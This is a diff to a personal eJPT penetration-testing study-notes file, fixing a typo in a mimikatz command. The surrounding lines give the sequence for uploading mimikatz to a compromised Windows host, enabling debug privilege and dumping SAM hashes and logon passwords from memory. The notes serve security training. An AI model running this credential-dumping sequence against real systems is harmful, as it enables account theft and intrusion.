AnuragTaparia/EJPT-notes/Host & Network Penetration Testing - System and Host Based Attacks.md

 	   `upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe`
 	   `shell`
 	   `.\mimikatz.exe`
-	   `prvilege::debug` -- if gives Privilege '20' ok then you have required privilege in order to perform hash extraction from memory
+	   `privilege::debug` -- if gives Privilege '20' ok then you have required privilege in order to perform hash extraction from memory
 	   `lsadump::sam`
 	   `sekurlsa::logonpasswords`